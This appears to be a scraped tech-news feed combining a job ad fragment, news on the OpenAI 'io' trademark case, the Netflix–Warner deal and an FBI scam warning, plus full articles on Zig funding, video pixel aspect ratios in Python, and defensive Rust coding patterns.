The comp range for this role is $130k-200k, 1-5% equity, great healthcare + other perks, and an awesome office if you happen to be in SF. We're open to remote / hybrid candidates.

If you’d like to stand out, please share a project or piece of work that you’re most proud of. We love seeing people’s work. If you have a personal website, please include that as well.

If you're interested, email daniel@onlook.com with your Github / LinkedIn / Website or work samples and why you'd be a great addition to the team, or apply here: https://www.ycombinator.com/companies/onlook/jobs/e4gHv1n-fo...

Excited to meet, and build alongside you!

Coupongogo: Remote-Controlled Crypto Stealer Targeting Developers on GitHub

Lobsters
www.rastersec.com
2025-12-05 16:50:24
Comments...
Original Article

Jony Ive's OpenAI Device Barred from Using 'Io' Name

Hacker News
www.macrumors.com
2025-12-05 16:48:44
Comments...
Original Article

A U.S. appeals court has upheld a temporary restraining order that prevents OpenAI and Jony Ive's new hardware venture from using the name "io" for products similar to those planned by AI audio startup iyO, Bloomberg Law reports.

iyO sued OpenAI earlier this year after the latter announced its partnership with Ive's new firm, arguing that OpenAI's planned "io" branding was too close to its own name and related to similar AI-driven hardware. Court filings later showed that Ive and Sam Altman chose the name io in mid-2023, and that iyO CEO Jason Rugolo had approached Altman in early 2025 seeking funding for a project about "the future of human-computer interface." Altman declined, saying he was already working on "something competitive."

OpenAI countered that io's first product would not be a wearable device, and that Rugolo had voluntarily disclosed details about iyO while suggesting OpenAI acquire his company for $200 million. Despite this, a district court issued a temporary restraining order blocking OpenAI, Altman, Ive, and IO Products, Inc. from using the io mark in connection with products deemed sufficiently similar to iyO's planned AI-audio computer. OpenAI removed its io branding shortly after.

The Ninth Circuit affirmed the order earlier this week. The court agreed there was a likelihood of confusion between "IO" and "iyO," that reverse confusion was a significant risk given OpenAI's size, and that iyO could face irreparable harm to its brand and fundraising. However, the ruling does not bar all uses of the io name, only marketing and selling hardware similar to iyO's.

The case now returns to the district court for a preliminary injunction hearing in April 2026, with the broader litigation expected to extend into 2027 and 2028. OpenAI's first hardware device is expected to launch next year.


Netflix Agrees to Buy Warner Bros., Including HBO, for $83 Billion

Daring Fireball
www.latimes.com
2025-12-05 16:47:44
Meg James, reporting for The Los Angeles Times (News+ link): The two companies announced the blockbuster deal early Friday morning. The takeover would give Netflix such beloved characters as Batman, Harry Potter and Fred Flintstone. Fred Flintstone? “Our mission has always been to entertai...
Original Article

Netflix has prevailed in its bid to buy Warner Bros., agreeing to pay $72 billion for the Burbank-based Warner Bros. film and television studios, HBO Max and HBO.

The two companies announced the blockbuster deal early Friday morning. The takeover would give Netflix such beloved characters as Batman, Harry Potter and Fred Flintstone.

“Our mission has always been to entertain the world,” Ted Sarandos, co-CEO of Netflix, said in a statement. “By combining Warner Bros.’ incredible library of shows and movies — from timeless classics like ‘Casablanca’ and ‘Citizen Kane’ to modern favorites like ‘Harry Potter’ and ‘Friends’ — with our culture-defining titles like ‘Stranger Things,’ ‘KPop Demon Hunters’ and ‘Squid Game,’ we’ll be able to do that even better.”

Netflix’s cash and stock transaction is valued at about $27.75 per Warner Bros. Discovery share. Netflix also agreed to take on more than $10 billion in Warner Bros. debt, pushing the deal’s value to $82.7 billion.

The breakthrough came earlier this week, after the three contenders — Netflix, Paramount and Comcast — submitted binding second-round offers. Netflix’s victory was assured by late Thursday, soon after another deadline for last-minute deal sweeteners. Netflix and Warner’s boards separately and unanimously approved the transaction.

Warner’s cable channels, including CNN, TNT and HGTV, are not included in the deal. They will form a new publicly traded company, Discovery Global, in mid-2026.

Antitrust experts anticipate opposition to Netflix’s proposed takeover. Netflix has more than 300 million streaming subscribers worldwide, and with HBO Max, the company’s base would swell to more than 420 million subscribers — a staggering sum, far larger than that of any other premium video-on-demand streaming service.

In addition, Netflix has long prioritized releasing movies to its streaming platform — bypassing movie theater chains.

The deal posed “an unprecedented threat to the global exhibition business,” Cinema United, a trade group representing owners of more than 50,000 movie screens, said in a statement announcing its opposition.

“The negative impact of this acquisition will impact theatres from the biggest circuits to one-screen independents in small towns in the United States and around the world,” Cinema United President Michael O’Leary said in a statement. “Netflix’s stated business model does not support theatrical exhibition.”

Netflix, in the statement, said it would maintain Warner Bros. operations, including theatrical releases for Warner Bros. films.

The Directors Guild of America said the proposed combination “raises significant concerns.”

“A vibrant, competitive industry — one that fosters creativity and encourages genuine competition for talent — is essential to safeguarding the careers and creative rights of directors and their teams,” a DGA spokesperson said. “We will be meeting with Netflix to outline our concerns and better understand their vision for the future of the company.”

Losing the auction is a crushing blow for Paramount’s David Ellison, the 42-year-old tech scion who envisioned building a juggernaut with the two storied movie studios, HBO and two dozen cable channels.

One month after buying Paramount, he set his sights on Warner Bros., triggering the auction with a series of unsolicited bids in September and early October.

But Warner Bros. Discovery’s board rejected Paramount’s offers as too low. In late October, the board opened the auction up to other bidders.

Comcast also leaped into the bidding for Warner’s studios, HBO and its streaming service. Comcast wanted to spin off its NBCUniversal media assets and merge them with Warner Bros. to form a new jumbo studio.


X hit with $140M EU fine for breaching content rules

Hacker News
www.reuters.com
2025-12-05 16:42:13
Comments...
Original Article


Synadia and TigerBeetle Pledge $512,000 to the Zig Software Foundation

Hacker News
tigerbeetle.com
2025-12-05 16:38:30
Comments...
Original Article

Synadia and TigerBeetle have together pledged $512,000 to the Zig Software Foundation over the next two years in support of the language, leadership, and communities building the future of simpler systems software.

I first saw Zig in 2018, seven years ago. Two years later, I chose Zig over C or Rust for TigerBeetle.

In 2020, I was following Rust closely. At the time, Rust’s default memory philosophy was to crash when out of memory (OOM). However, for TigerBeetle, I wanted explicit static allocation, following NASA’s Power of Ten Rules for Safety-Critical Code, which would become a part of TigerStyle, a methodology for creating safer software in less time.

What I learned is that if you could centralize resource allocation in time and space (the dimensions that prove tricky for humans writing software) then this could not only simplify memory management, to design away some of the need for a borrow checker in the first place, but, more importantly, also be a forcing function for propagating good design, to encourage teams to think through the explicit limits or physics of the software (you have no choice).

From a performance perspective, I didn’t want TigerBeetle to be fearlessly multithreaded. Transaction processing workloads tend to have inherent contention, even to the point of power law, precluding partitioning and necessitating a single-threaded architecture. Therefore, Rust’s borrow checker, while a phenomenal tool for the class of problems it targets, made less sense for TigerBeetle. TigerBeetle never frees memory and never runs multithreaded, instead using explicit submission/completion queue interfaces by design.

Finally, while the borrow checker could achieve local memory safety, TigerBeetle needed more correctness properties. TigerBeetle needed to be always correct, and across literally thousands of invariants. As matklad would say, this is a harder problem! I had also spent enough time in memory safe languages to know that local memory safety is no guarantee of local correctness, let alone distributed system correctness. Per systems thinking, I believe that total correctness is a design problem, not a language problem. Language is valuable. But no human language can guarantee the next Hemingway or Nabokov. For this you need philosophy. Even then it’s not a guarantee but a probability.

With Rust off the table, the choice fell to C or Zig. A language of the past or future?

Zig was early, which gave me pause, but I felt that the quality of Andrew Kelley’s design decisions in the language, the standard library (e.g. the unmanaged hashmap interface) and the cross-compilation toolchain, even five years ago, was already exceptional.

Andrew’s philosophy resonated with what I wanted to explore in TigerStyle. No hidden memory allocations. No hidden control flow. No preprocessor. No macros. And then you get things like comptime, reducing the grammar and dimensionality of the language, while simultaneously multiplying its power. The primary benefit of Zig is the favorable ratio of expressivity to language complexity.

As a replacement for C, Zig fixed not only the small cuts, such as explicit alignment in the type system for Direct I/O, or safer casts, but the showstoppers of spatial memory safety through bounds checking, and, to a lesser degree (but not guarantee), temporal memory safety through the debug allocator.

Zig also enabled checked arithmetic by default in safe builds, which is something I believe only Ada and Swift do (remarkably, Rust disables checked arithmetic by default in safe builds—a default I would love to see changed). TigerBeetle separates the data plane from the control plane by design, through batching, so the runtime cost of these safety checks was not material, being amortized in the data plane across bigger buffers. While a borrow checker or static allocation can simplify memory management, getting logic and arithmetic correct remains hard. Of course, you can enable checked arithmetic in other languages, but I appreciated Andrew’s concern for checked arithmetic and stricter operands by default.

In all these things, what impressed me most was Zig’s approach to safety when working with the metal. Not in terms of an on/off decision, but as a spectrum. Not aiming for 100% guarantees across 1 or 2 categories, but 90% and then across more categories. Not eliminating classes of bugs, but downgrading their probability. All while preserving the power-to-weight ratio of the language, to keep the language beautifully simple.

Many languages start simple and grow complex as features are added. Zig’s simplicity is unusual in that it comes from a subtractive discipline (e.g. no private fields) rather than a deferred complexity; minimizing surface area is part of the ethos of the language. The simplicity of Zig meant that we could hire great programmers from any language background—they could pick up Zig in a weekend. Indeed, I’ve never had to talk to a new hire about learning Zig.

Finally, there was the timing. I recognized that TigerBeetle would take time to reach production (we shipped in 2024, after 3.5 years of development), giving Zig time to mature and our trajectories time to intersect.

Investing in creating a database like TigerBeetle is a long term effort. Databases tend to have a long half life (e.g. Postgres is 30 years old). And so, while Zig being early in 2020 did give me pause, nevertheless Zig’s quality, philosophy and simplicity made sense for a multi-decade horizon.

How has the decision for Zig panned out?

TigerBeetle is tested end-to-end under some pretty extreme fuzzing. We did have three bugs that would have been prevented by the borrow checker, but these were caught by our fuzzers and online verification. We run a fuzzing fleet of 1,000 dedicated CPU cores 24/7. We invest in deterministic simulation testing (e.g. VOPR), as well as non-deterministic fault-injection harnesses (e.g. Vörtex). We engaged Kyle Kingsbury in one of the longest Jepsen audits to date—four times the typical duration. Through all this, Zig’s quality held up flawlessly.

Zig has also been a huge part of our success as a company. TigerBeetle is only 5 years old but is already migrating some of the largest brokerages, exchanges and wealth managers in their respective jurisdictions. Several of our key enterprise contracts were thanks to the CTOs and even CEOs of these companies also following Zig and seeing the quality we wanted to achieve with it. I don’t think we could have written TigerBeetle as it is, in any other language, at least not to the same tight tolerances, let alone with the same velocity.

Zig’s language specification will only reach 1.0 when all experimental areas of the language (e.g. async I/O) are finally done. For TigerBeetle, we care only about the stable language features we use, testing our binaries end to end, as we would for any language. Nevertheless, upgrading to new versions, even with breaking changes, has only been a pleasure for us as a team. The upgrade work is usually fully paid for by compilation time reduction. For example, the upgrade from Zig 0.14.1 to Zig 0.15.2 (with the native x86_64 backend) makes debug builds 2x faster, and even LLVM release builds become 1.6x faster. With each release, you can literally feel the sheer amount of effort that the entire Zig core team put into making Zig the world’s most powerful programming language—and toolchain.

Back in 2020, from a production perspective, Zig was more or less a frontend to LLVM, the same compiler used by Rust, Swift and other languages. However, by not shying away from also investing in its own independent compiler backends and toolchain, by appreciating the value of replacing LLVM long term, Zig is becoming well positioned to gain a low-level precision and compilation speed that generic LLVM won’t always be able to match.

We want Andrew to take his time, to get these things right for the long term. Fred Brooks once said that conceptual integrity is “the most important consideration” in system design, that the design must proceed from one mind.

In this spirit, I am grateful for Andrew’s remarkably strong leadership (and taste) in the design of the language and toolchain. There can be thankless pressure on an open source project to give in to the tragedy of the commons. But if anything, in hindsight I think this is what I’ve most appreciated about choosing Zig for TigerBeetle, that Zig has a strong BDFL.

Of course, some may hear “BDFL” and see governance risk. But I fear the opposite: conceptual risk, the harder problem. Brooks was right—conceptual integrity is almost certainly doomed by committee. Whereas governance is more easily solved: put it in the hands not of the corporates but of the people, the individuals who choose each day to continue to donate.

This is why our pledge today, along with all other ZSF donors, is a simple donation with no strings attached. The Zig Software Foundation is well managed, transparent and independent. We want it to remain this way. The last thing we want is some kind of foundation “seat”. Andrew is Chef. We want to let him cook, and pay his core team sustainably (e.g. 92% of the budget goes directly to paying contributors).

If cooking is one metaphor, then surfing is another. I believe that technology moves in waves. The art is not in paddling to the wave with a thousand surfers on it. But in spotting the swell before it breaks. And then enjoying the ride with the early adopters who did the same. River , Ghostty , Bun , Mach and many fellow surfers.

In fact, it was through Zig that I met Derek Collison, who like me had been sponsoring the language in his personal capacity since 2018. As a former CTO at VMware, Derek was responsible for backing antirez to work full time on Redis. Derek later went on to create NATS, founding Synadia.

As we were about to increase TigerBeetle’s yearly donation to Zig, I reached out to Derek, and we decided to do a joint announcement, following Mitchell Hashimoto’s lead: each of our companies will donate $256,000 in monthly installments over the next two years, with Synadia matching TigerBeetle, for a total of $512,000—the first installment already made.

Please consider donating or increasing your donation if you can. And if you are a CEO or CTO, please team up with another company to outmatch us! Thanks Andrew for creating something special, and to all who code for the joy of the craft:

Together we serve the users.

When square pixels aren’t square

Lobsters
alexwlchan.net
2025-12-05 16:38:03
Comments...
Original Article

When I embed videos in web pages, I specify an aspect ratio. For example, if my video is 1920 × 1080 pixels, I’d write:

<video style="aspect-ratio: 1920 / 1080">

If I also set a width or a height, the browser now knows exactly how much space this video will take up on the page – even if it hasn’t loaded the video file yet. When it initially renders the page, it can leave the right gap, so it doesn’t need to rearrange when the video eventually loads. (The technical term is “reducing cumulative layout shift”.)

That’s the idea, anyway.

I noticed that some of my videos weren’t fitting in their allocated boxes. When the video file loaded, it could be too small and get letterboxed, or be too big and force the page to rearrange to fit. Clearly there was a bug in my code for computing aspect ratios, but what?

Three aspect ratios, one video

I opened one of the problematic videos in QuickTime Player, and the resolution listed in the Movie Inspector was rather curious: Resolution: 1920 × 1080 (1350 × 1080).

The first resolution is what my code was reporting, but the second resolution is what I actually saw when I played the video. Why are there two?

The storage aspect ratio (SAR) of a video is the pixel resolution of a raw frame. If you extract a single frame as a still image, that’s the size of the image you’d get. This is the first resolution shown by QuickTime Player, and it’s what I was reading in my code.

I was missing a key value – the pixel aspect ratio (PAR). This describes the shape of each pixel, in particular the width-to-height ratio. It tells a video player how to stretch or squash the stored pixels when it displays them. This can sometimes cause square pixels in the stored image to appear as rectangles.

[Figure: three 3×3 pixel grids. PAR < 1: portrait pixels (taller than wide). PAR = 1: square pixels. PAR > 1: landscape pixels (wider than tall).]

This reminds me of EXIF orientation for still images – a transformation that the viewer applies to the stored data. If you don’t apply this transformation properly, your media will look wrong when you view it. I wasn’t accounting for the pixel aspect ratio in my code.

According to Google, the primary use case for non-square pixels is standard-definition televisions which predate digital video. However, I’ve encountered several videos with an unusual PAR that were made long into the era of digital video, when that seems unlikely to be a consideration. It’s especially common in vertical videos like YouTube Shorts, where the stored resolution is a square 1080 × 1080, and the aspect ratio makes it a portrait.

I wonder if it’s being introduced by a processing step somewhere? I don’t understand why, but I don’t have to – I’m only displaying videos, not producing them.

The display aspect ratio (DAR) is the size of the video as viewed – what happens when you apply the pixel aspect ratio to the stored frames. This is the second resolution shown by QuickTime Player, and it’s the aspect ratio I should be using to preallocate space in my video player.

These three values are linked by a simple formula:

DAR = SAR × PAR

The size of the viewed video is the stored resolution times the shape of each pixel.

The stored frame may not be what you see

One video with a non-unit pixel aspect ratio is my download of Mars EDL 2020 Remastered. This video by Simeon Schmauß tries to match what the human eye would have seen during the landing of NASA’s Perseverance rover in 2021.

We can get the width, height, and sample aspect ratio (which is another name for pixel aspect ratio) using ffprobe:

$ ffprobe -v error \
      -select_streams v:0 \
      -show_entries stream=width,height,sample_aspect_ratio \
      "Mars 2020 EDL Remastered [HHhyznZ2u4E].mp4"
[STREAM]
width=1920
height=1080
sample_aspect_ratio=45:64
[/STREAM]

Here 1920 is the stored width, and 45:64 is the pixel aspect ratio. We can multiply them together to get the display width: 1920 × 45 / 64 = 1350. This matches what I saw in QuickTime Player.

Let’s extract a single frame using ffmpeg to get the stored pixels. This command saves the 5000th frame as a PNG image:

$ ffmpeg -i "Mars 2020 EDL Remastered [HHhyznZ2u4E].mp4" \
    -filter:v "select=eq(n\,5000)" \
    -frames:v 1 \
    frame.png

The image is 1920 × 1080 pixels, and it looks wrong: the circular parachute is visibly stretched.

Photo looking up towards a parachute against a dark brown sky. The parachute is made of white-and-orange segments, and is stretched horizontally. The circle is wider than it is tall.

Suppose we take that same image, but now apply the pixel aspect ratio. This is what the image is meant to look like, and it’s not a small difference – now the parachute actually looks like a circle.

The same photo as before, but now the parachute is a circle.

Seeing both versions side-by-side makes the problem obvious: the stored frame isn’t how the video is displayed. The video player in my browser will play it correctly using the pixel aspect ratio, but my layout code wasn’t doing that. I was telling the browser the wrong aspect ratio, and the browser had to update the page when it loaded the video file.

Getting the correct display dimensions in Python

This is my old function for getting the dimensions of a video file, which uses a Python wrapper around MediaInfo to extract the width and height fields. I now realise that this only gives me the storage aspect ratio, and may be misleading for some videos.

from pathlib import Path

from pymediainfo import MediaInfo


def get_storage_aspect_ratio(video_path: Path) -> tuple[int, int]:
    """
    Returns the storage aspect ratio of a video, as a width/height ratio.
    """
    media_info = MediaInfo.parse(video_path)
    
    try:
        video_track = next(
            tr
            for tr in media_info.tracks
            if tr.track_type == "Video"
        )
    except StopIteration:
        raise ValueError(f"No video track found in {video_path}")
    
    return video_track.width, video_track.height

I can’t find an easy way to extract the pixel aspect ratio using pymediainfo. It does expose a Track.aspect_ratio property, but that’s a string which has a rounded value – for example, 45:64 becomes 0.703. That’s close, but the rounding introduces a small inaccuracy. Since I can get the complete value from ffprobe, that’s what I’m doing in my revised function.

The new function is longer, but it’s more accurate:

from fractions import Fraction
import json
from pathlib import Path
import subprocess


def get_display_aspect_ratio(video_path: Path) -> tuple[int, int]:
    """
    Returns the display aspect ratio of a video, as a width/height fraction.
    """
    cmd = [
        "ffprobe",
        #
        # verbosity level = error
        "-v", "error",
        #
        # only get information about the first video stream
        "-select_streams", "v:0",
        #
        # only gather the entries I'm interested in
        "-show_entries", "stream=width,height,sample_aspect_ratio",
        #
        # print output in JSON, which is easier to parse
        "-print_format", "json",
        #
        # input file
        str(video_path)
    ]
    
    output = subprocess.check_output(cmd)
    ffprobe_resp = json.loads(output)
    
    # The output will be structured something like:
    #
    #   {
    #       "streams": [
    #           {
    #               "width": 1920,
    #               "height": 1080,
    #               "sample_aspect_ratio": "45:64"
    #           }
    #       ],
    #       …
    #   }
    #
    # If the video doesn't specify a pixel aspect ratio, then it won't
    # have a `sample_aspect_ratio` key.
    video_stream = ffprobe_resp["streams"][0]
    
    try:
        pixel_aspect_ratio = Fraction(
            video_stream["sample_aspect_ratio"].replace(":", "/")
        )
    except KeyError:
        pixel_aspect_ratio = 1
    
    width = round(video_stream["width"] * pixel_aspect_ratio)
    height = video_stream["height"]
    
    return width, height

This is calling the ffprobe command I showed above, plus -print_format json to print the data in JSON, which is easier for Python to parse.

I have to account for the case where a video doesn’t set a sample aspect ratio – in that case, the displayed video just uses square pixels.

Since the aspect ratio is expressed as a ratio of two integers, this felt like a good chance to try the fractions module. That avoids converting the ratio to a floating-point number, which potentially introduces inaccuracies. It doesn’t make a big difference, but in my video collection treating the aspect ratio as a float produces results that are 1 or 2 pixels different from QuickTime Player.

When I multiply the stored width and aspect ratio, I’m using the round() function to round the final width to the nearest integer. That’s more accurate than int() , which always rounds down.
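
To make both points concrete, here is a minimal illustration using the Mars video’s numbers (45:64 is the exact ratio reported by ffprobe; 0.703 is the rounded string that pymediainfo reports):

from fractions import Fraction

stored_width = 1920
par_exact = Fraction(45, 64)   # exact pixel aspect ratio, from ffprobe
par_rounded = 0.703            # rounded value, as reported by pymediainfo

# The exact fraction gives the display width with no floating-point error.
print(stored_width * par_exact)           # 1350

# The rounded float is close, but truncating with int() loses a pixel.
print(round(stored_width * par_rounded))  # 1350
print(int(stored_width * par_rounded))    # 1349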

Conclusion: use display aspect ratio

When you want to know how much space a video will take up on a web page, look at the display aspect ratio, not the stored pixel dimensions. Pixels can be squashed or stretched before display, and the stored width/height won’t tell you that.

Videos with non-square pixels are pretty rare, which is why I ignored this for so long. I’m glad I finally understand what’s going on.

After switching to ffprobe and using the display aspect ratio, my pre-allocated video boxes now match what the browser eventually renders – no more letterboxing, no more layout jumps.
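
As a final sketch of how this fits together (assuming the get_display_aspect_ratio function above, and using the Mars video from earlier), the corrected dimensions feed straight into the aspect-ratio declaration:

from pathlib import Path

width, height = get_display_aspect_ratio(
    Path("Mars 2020 EDL Remastered [HHhyznZ2u4E].mp4")
)

# Emit the embed markup with the display aspect ratio, so the browser
# reserves the right amount of space before the video file loads.
print(f'<video style="aspect-ratio: {width} / {height}">')
# <video style="aspect-ratio: 1350 / 1080">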

FBI warns of virtual kidnapping scams using altered social media photos

Bleeping Computer
www.bleepingcomputer.com
2025-12-05 16:37:28
The FBI warns of criminals altering images shared on social media and using them as fake proof of life photos in virtual kidnapping ransom scams. [...]...
Original Article


The FBI warns of criminals altering images shared on social media and using them as fake proof of life photos in virtual kidnapping ransom scams.

This is part of a public service announcement published today about criminals contacting victims via text message, claiming to have kidnapped a family member and demanding ransom payments.

However, as the FBI explained, virtual kidnapping scams involve no actual abduction. Instead, criminals use manipulated images found on social networks and publicly available information to create convincing scenarios designed to pressure victims into paying ransoms before verifying that their loved ones are safe.

"Criminal actors typically will contact their victims through text message claiming they have kidnapped their loved one and demand a ransom be paid for their release," the FBI said on Friday.

"Oftentimes, the criminal actor will express significant claims of violence towards the loved one if the ransom is not paid immediately. The criminal actor will then send what appears to be a genuine photo or video of the victim's loved one, which upon close inspection often reveals inaccuracies when compared to confirmed photos of the loved one."

The law enforcement agency advised the public to be cautious of scammers who often create a false sense of urgency and to carefully assess the validity of the kidnappers' claims.

To defend against such scams, the FBI recommends taking several protective measures, such as avoiding providing personal information to strangers while traveling and establishing a code word known only to the family to verify communications during emergencies.

Additionally, when sharing information about missing persons online, one should remain vigilant, as scammers might reach out with false information.

The FBI also recommends taking screenshots or recording proof-of-life photos whenever possible for later analysis during investigations, since scammers sometimes deliberately send these photos using timed message features to limit the time victims have to analyze the images.

While the FBI didn't share how many complaints regarding these virtual kidnapping scams have been filed with its Internet Crime Complaint Center or how widespread this type of fraud is at the moment, BleepingComputer has found multiple instances of people targeted by similar scams that spoofed their loved ones' phone numbers .


Patterns for Defensive Programming in Rust

Hacker News
corrode.dev
2025-12-05 16:34:25
Comments...
Original Article

I have a hobby.

Whenever I see the comment // this should never happen in code, I try to find out the exact conditions under which it could happen. And in 90% of cases, I find a way to do just that. More often than not, the developer just hasn’t considered all edge cases or future code changes.

In fact, the reason I like this comment so much is that it often marks the exact spot where strong guarantees fall apart. More often than not, the root cause is an implicit invariant that isn’t enforced by the compiler.

Yes, the compiler prevents memory safety issues, and the standard library is best-in-class. But even the standard library has its warts, and bugs in business logic can still happen.

What we can rely on are hard-learned patterns for writing more defensive Rust code, picked up over years of shipping Rust to production. I’m not talking about design patterns here, but rather small idioms that are rarely documented yet make a big difference in overall code quality.

Code Smell: Indexing Into a Vector

Here’s some innocent-looking code:

if !matching_users.is_empty() {
    let existing_user = &matching_users[0];
    // ...
}

What if you refactor it and forget to keep the is_empty() check? The problem is that the vector indexing is decoupled from checking the length. So matching_users[0] can panic at runtime if the vector is empty.

Checking the length and indexing are two separate operations, which can be changed independently. That’s our first implicit invariant that’s not enforced by the compiler.

If we use slice pattern matching instead, we’ll only get access to the element if the correct match arm is executed.

match matching_users.as_slice() {
    [] => todo!("What to do if no users found!?"),
    [existing_user] => {
        // Safe! The compiler guarantees exactly one element.
        // No need to index into the vector;
        // we can use `existing_user` directly here.
    }
    _ => Err(RepositoryError::DuplicateUsers)
}

Note how this automatically uncovered one more edge case: what if the list is empty? We hadn’t explicitly considered this case before. The compiler-enforced pattern matching requires us to think about all possible states! This is a common pattern in all robust Rust code: putting the compiler in charge of enforcing invariants.

Code Smell: Lazy use of Default

When initializing an object with many fields, it’s tempting to use ..Default::default() to fill in the rest. In practice, this is a common source of bugs. You might forget to explicitly set a new field later when you add it to the struct (thus using the default value instead, which might not be what you want), or you might not be aware of all the fields that are being set to default values.

Instead of this:

let foo = Foo {
    field1: value1,
    field2: value2,
    ..Default::default()  // Implicitly sets all other fields
};

Do this:

let foo = Foo {
    field1: value1,
    field2: value2,
    field3: value3, // Explicitly set all fields
    field4: value4,
    // ...
};

Yes, it’s slightly more verbose, but what you gain is that the compiler will force you to handle all fields explicitly. Now when you add a new field to Foo , the compiler will remind you to set it here as well and reflect on which value makes sense.

If you still prefer to use Default but don’t want to lose compiler checks, you can also destructure the default instance:

let Foo { field1, field2, field3, field4 } = Foo::default();

This way, you get all the default values assigned to local variables and you can still override what you need:

let foo = Foo {
    field1: value1,    // Override what you need
    field2: value2,    // Override what you need
    field3,            // Use default value
    field4,            // Use default value
};

This pattern gives you the best of both worlds:

  • You get default values without duplicating default logic
  • The compiler will complain when new fields are added to the struct
  • Your code automatically adapts when default values change
  • It’s clear which fields use defaults and which have custom values
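To make the pattern concrete, here’s a minimal, self-contained sketch (the field types and values are made up for illustration):

#[derive(Default)]
struct Foo {
    field1: u32,
    field2: u32,
    field3: u32,
    field4: u32,
}

fn make_foo() -> Foo {
    // Exhaustive destructuring of the default instance: if a `field5`
    // is ever added to `Foo`, this line stops compiling until the new
    // field is accounted for.
    let Foo { field1: _, field2: _, field3, field4 } = Foo::default();
    Foo {
        field1: 42, // Override what you need
        field2: 7,  // Override what you need
        field3,     // Keep the default
        field4,     // Keep the default
    }
}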

Code Smell: Fragile Trait Implementations

Completely destructuring a struct into its components can also be a defensive strategy for API adherence. For example, let’s say you’re building a pizza ordering system and have an order type like this:

struct PizzaOrder {
    size: PizzaSize,
    toppings: Vec<Topping>,
    crust_type: CrustType,
    ordered_at: SystemTime,
}

For your order tracking system, you want to compare orders based on what’s actually on the pizza: the size, toppings, and crust_type. The ordered_at timestamp shouldn’t affect whether two orders are considered the same.

Here’s the problem with the obvious approach:

impl PartialEq for PizzaOrder {
    fn eq(&self, other: &Self) -> bool {
        self.size == other.size
            && self.toppings == other.toppings
            && self.crust_type == other.crust_type
    }
}

Now imagine your team adds a field for customization options:

struct PizzaOrder {
    size: PizzaSize,
    toppings: Vec<Topping>,
    crust_type: CrustType,
    ordered_at: SystemTime,
    extra_cheese: bool,  // New field added
}

Your PartialEq implementation still compiles, but is it correct? Should extra_cheese be part of the equality check? Probably yes - a pizza with extra cheese is a different order! But you’ll never know because the compiler won’t remind you to think about it.

Here’s the defensive approach using destructuring:

impl PartialEq for PizzaOrder {
    fn eq(&self, other: &Self) -> bool {
        let Self {
            size,
            toppings,
            crust_type,
            ordered_at: _,
        } = self;
        let Self {
            size: other_size,
            toppings: other_toppings,
            crust_type: other_crust,
            ordered_at: _,
        } = other;

        size == other_size && toppings == other_toppings && crust_type == other_crust
    }
}

Now when someone adds the extra_cheese field, this code won’t compile anymore. The compiler forces you to decide: should extra_cheese be included in the comparison or explicitly ignored with extra_cheese: _ ?

This pattern works for any trait implementation where you need to handle struct fields: Hash , Debug , Clone , etc. It’s especially valuable in codebases where structs evolve frequently as requirements change.
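For instance, a Hash implementation can use the same exhaustive destructuring (a sketch reusing the PizzaOrder type above and assuming its field types implement Hash):

use std::hash::{Hash, Hasher};

impl Hash for PizzaOrder {
    fn hash<H: Hasher>(&self, state: &mut H) {
        // Adding a field to PizzaOrder breaks this impl until the new
        // field is either hashed or explicitly ignored.
        let Self {
            size,
            toppings,
            crust_type,
            ordered_at: _, // Ignored, consistent with the PartialEq impl
        } = self;
        size.hash(state);
        toppings.hash(state);
        crust_type.hash(state);
    }
}

Ignoring ordered_at in both PartialEq and Hash keeps the two implementations consistent with each other, which hash maps rely on.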

Code Smell: From Impls That Are Really TryFrom

Sometimes there’s no conversion that will work 100% of the time. That’s fine. When that’s the case, resist the temptation to offer a From implementation out of habit; use TryFrom instead.

Here’s an example of TryFrom in disguise:

impl From<&DetectorStartupErrorReport> for DetectorStartupErrorSubject {
    fn from(report: &DetectorStartupErrorReport) -> Self {
        let postfix = report
            .get_identifier()
            .or_else(get_binary_name)
            .unwrap_or_else(|| UNKNOWN_DETECTOR_SUBJECT.to_string());

        Self(StreamSubject::from(
            format!("apps.errors.detectors.startup.{postfix}").as_str(),
        ))
    }
}

The unwrap_or_else is a hint that this conversion can fail. We fall back to a default value instead, but is that really the right thing to do for all callers? This should be a TryFrom implementation, making the fallible nature explicit. We fail fast instead of continuing with potentially flawed business logic.
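Here’s a sketch of the same conversion as TryFrom, reusing the types from the snippet above (the MissingIdentifier error type is hypothetical, not from the original):

// Hypothetical error type for the fallible conversion
#[derive(Debug)]
pub struct MissingIdentifier;

impl TryFrom<&DetectorStartupErrorReport> for DetectorStartupErrorSubject {
    type Error = MissingIdentifier;

    fn try_from(report: &DetectorStartupErrorReport) -> Result<Self, Self::Error> {
        let postfix = report
            .get_identifier()
            .or_else(get_binary_name)
            .ok_or(MissingIdentifier)?; // Fail fast instead of guessing a default

        Ok(Self(StreamSubject::from(
            format!("apps.errors.detectors.startup.{postfix}").as_str(),
        )))
    }
}

Callers now decide for themselves how to handle a missing identifier instead of silently inheriting a default.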

Code Smell: Non-Exhaustive Matches

It’s tempting to use match in combination with a catch-all pattern like _ => {} , but this can haunt you later. The problem is that you might forget to handle a new case that was added later.

Instead of:

match self {
    Self::Variant1 => { /* ... */ }
    Self::Variant2 => { /* ... */ }
    _ => { /* catch-all */ }
}

Use:

match self {
    Self::Variant1 => { /* ... */ }
    Self::Variant2 => { /* ... */ }
    Self::Variant3 => { /* ... */ }
    Self::Variant4 => { /* ... */ }
}

By spelling out all variants explicitly, the compiler will warn you when a new variant is added, forcing you to handle it. Another case of putting the compiler to work.

If the code for two variants is the same, you can group them:

match self {
    Self::Variant1 => { /* ... */ }
    Self::Variant2 => { /* ... */ }
    Self::Variant3 | Self::Variant4 => { /* shared logic */ }
}

Code Smell: _ Placeholders for Unused Variables

Using _ as a placeholder for unused variables can lead to confusion: it’s easy to lose track of which variable was skipped. That’s especially true for boolean flags:

match self {
    Self::Rocket(_, _, ..) => { /* ... */ }
}

In the above example, it’s not clear which fields were skipped and why. Better to use named fields with descriptive names, even for the ones that are not used:

match self {
    Self::Rocket { has_fuel: _, has_crew: _, .. } => { /* ... */ }
}

Even if you don’t use the variables, it’s clear what they represent and the code becomes more readable and easier to review without inline type hints.

Pattern: Temporary Mutability

If you only want your data to be mutable temporarily, make that explicit.

let mut data = get_vec();
data.sort();
let data = data;  // Shadow to make immutable

// Here `data` is immutable.

This pattern is often called “temporary mutability” and helps prevent accidental modifications after initialization. See the Rust unofficial patterns book for more details.

You can go one step further and do the initialization part in a scope block:

let data = {
    let mut data = get_vec();
    data.sort();
    data  // Return the final value
};
// Here `data` is immutable

